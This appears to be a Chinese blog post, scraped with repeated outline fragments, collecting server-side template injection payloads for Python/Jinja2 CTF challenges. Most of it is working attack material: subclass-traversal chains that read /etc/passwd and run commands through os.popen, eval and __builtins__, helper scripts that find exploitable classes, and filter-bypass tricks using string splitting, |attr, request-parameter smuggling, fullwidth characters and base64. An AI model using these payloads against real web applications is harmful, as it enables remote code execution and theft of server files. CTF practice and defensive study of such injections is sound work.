当前位置：网站首页>SSTI-payload和各种绕过方法

SSTI-payload和各种绕过方法

2022-07-26 05:11:00 【jjj34】

总结SSTI题目的流程(以python3为例)

类的下标会因为python版本的不同(python2,python3)而不同

1.找到object类,通过mro或bases来找

 //针对不同的网站需要对索引进行修改，直到返回的类为object
''.__class__.__mro__[1]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]
request.__class__.__mro__[11]

如下：

2.查看object类的子类，通过.subclasses()

在不同题目中的子类不同，有一些会被禁掉，通过下面这些payload查看哪些可以用的

''.__class__.__mro__[1].__subclasses__()
{}.__class__.__bases__[0].__subclasses__()
().__class__.__bases__[0].__subclasses__()
[].__class__.__bases__[0].__subclasses__()

3.通过子类找能利用的函数

1. 文件读取第91个<class '_frozen_importlib_external.FileLoader'>

''.__class__.__mro__[1].__subclasses__()[91].get_data(0,'文件路径')

2.文件读写第40个<class file>(如果有的话)

#读
''.__class__.__mro__[1].__subclasses__()[40]('文件路径').read()
#写
''.__class__.__mro__[1].__subclasses__()[40]('文件路径','写的方式').write()

3.命令执行

直接利用os.popen

object下的第71个类 <class 'site._Printer'>

{
   {''.__class__.__mro__[1].__subclasses__()[71].__init__.__globals__['os'].popen('whoami').read()}}

如果没有上面这个类就得麻烦一点，需要通过__import__ 或者 __builtins__来实现命令执行

做法：找到能够能够实现 .__init__.__globals__的类，并且进一步找模块： __import__ 或者 __builtins__

python代码如下：

num = 0
str1=''
select=input("请选择查找的方法:1.__builtins__;2.__import__;")

if select=='1' :
    str1="__builtins__"
if select=='2' :
    str1="__import__"

for item in ''.__class__.__mro__[1].__subclasses__():
    try:
        if str1 in item.__init__.__globals__:
            print(num,item)
            num+=1
    except:
        num+=1

或者用这个，一步到位找eval

count = -1
# for i in ''.class.mro[-1].subclasses():
for i in ''.__class__.__mro__[-1].__subclasses__():
    count += 1
    if "warpper" in repr(i.__init__):
        pass
    else:
        try:
            if "eval" in repr(i.__init__.__globals__['__builtins__']):
                print(count, i)
        except:
            pass

举个例子具有__builtins__的类

具有builtins的话：利用eval

{
   {''.__class__.__mro__[1].__subclasses__()[75].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("whoami").read()')}}

利用command(有些题目可能会提示没有command包，那就用不了)

{
   {
   {}.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__import__']('commands').getstatusoutput('ls')}}

{
   {
   {}.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__import__']('os').system('whoami')}}

{
   {''.__class__.__mro__[1].__subclasses__()[71].__init__.__globals__['os'].popen('whoami').read()}}

具有import方法

payload如下：

{
   {"".__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__import__('os').popen('whoami').read()}}

其他

Jinja2创建的url_for()方法

{
   {url_for.__globals__.os.popen("whoami").read()}}

通过config，调用os

{
   {config.__class__.__init__.__globals__['os'].popen('whoami').read()}}

下面的这几个不一定行

{
   {''.__class__.__base__.__subclasses__()[169].__init__.__globals__['sys'].modules['os'].popen("whoami").read()}}

// os._wrap_close类中的popen
{
   {"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('whoami').read()}}

// __builtins__
{
   {"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('whoami').read()}}

对命令执行进行总结：

1.找到object类

2.调用相关函数：

命令执行：os.system() , os.popen().read()，eval()

怎么找？ 1.通过python脚本去找

2.如果某个类没有os，却有import，可以通过import导入os的包后通过os进行命令执行

3.类的位置会因为python的版本不同而不同，只需要去官网查一下，或者自己一步一步找即可

至于怎么看服务器python的版本？->bp抓包，直接看返回包即可

各种绕过方式（欢迎补充）

方法1关键词被禁

通过拼接字符串

.__class__ -> ["__c""lass__"]

点被禁了

1.通过 [] 来替代点

.__class__ -> [__class__]

2.通过|attr()替换

.__class__ -> |attr("__class__")
如
request.__class__ -> request|attr("__class__")

方法2过滤了_

通过传递参数绕过

Get方式传参的

{
   {''.__class__}} => {
   {''[request.args.t1]}}?t1=__class__

Post方式传参（分两步）

{
   { ''[request.value.class][request.value.mro][2][request.value.subclasses]()[40]('/etc/passwd').read() }}

利用hackbar在这个页面传一个Post数据包

class=__class__&mro=__mro__&subclasses=__subclasses__

方法3过滤引号

也是通过传参实现绕过

{
   {().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(request.args.path).read()}}&path=/etc/passwd

方法4特殊字符绕过

符号大全-特殊符号-特殊符号大全 (fhdq.net)

直接在这上面ctrl+f搜等价替换的符号,然后利用python脚本进行替换

"""
{ -> ︷/﹛
} -> ︸/﹜
' -> ＇
, -> ，
" -> ＂
"""
str='{
   {\'\'.__class__}}' #原字符串
#如果需要替换replace(被替换的字符,替换后的字符)
str=str.replace('{','︷')
str=str.replace('}','︸')
str=str.replace('\'','＇')
str=str.replace('\"','＂')

print(str)

方法5编码绕过

[].__class__->[].__getattribute__('X19jbGFzc19f'.decode('base64'))

原网站

版权声明
本文为[jjj34]所创，转载请带上原文链接，感谢
https://blog.csdn.net/qq_44418229/article/details/125974915

当前位置：网站首页>SSTI-payload和各种绕过方法

SSTI-payload和各种绕过方法

总结SSTI题目的流程(以python3为例)

1.找到object类,通过mro或bases来找

2.查看object类的子类，通过.subclasses()

3.通过子类找能利用的函数

1. 文件读取第91个<class '_frozen_importlib_external.FileLoader'>

2.文件读写第40个<class file>(如果有的话)

3.命令执行

其他

各种绕过方式（欢迎补充）

方法1关键词被禁

方法2过滤了_

方法3过滤引号

方法4特殊字符绕过

方法5编码绕过

边栏推荐

猜你喜欢

随机推荐

当前位置：网站首页>SSTI-payload和各种绕过方法

SSTI-payload和各种绕过方法

总结SSTI题目的流程(以python3为例)

1.找到object类,通过__mro__或__bases__来找

2.查看object类的子类，通过.__subclasses__()

3.通过子类找能利用的函数

1. 文件读取第91个<class '_frozen_importlib_external.FileLoader'>

2.文件读写第40个<class file>(如果有的话)

3.命令执行

其他

各种绕过方式（欢迎补充）

方法1关键词被禁

方法2过滤了_

方法3过滤引号

方法4特殊字符绕过

方法5编码绕过

边栏推荐

猜你喜欢

随机推荐

1.找到object类,通过mro或bases来找

2.查看object类的子类，通过.subclasses()